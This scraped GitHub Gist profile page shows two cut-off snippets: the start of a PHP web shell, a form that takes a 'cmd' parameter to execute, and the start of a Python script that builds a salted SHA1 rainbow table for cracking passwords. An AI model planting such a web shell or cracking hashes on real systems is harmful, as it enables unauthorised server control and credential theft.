Skip to content

Instantly share code, notes, and snippets.

View kangmyoungseok's full-sized avatar
😛

Myoungseok Kang kangmyoungseok

😛
View GitHub Profile
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
import hashlib
from tqdm import tqdm
import re
SALT = 'salt_for_you'
fd = open("rainbow.txt",'w')
def sha1_500(plain_text):
for i in range(500):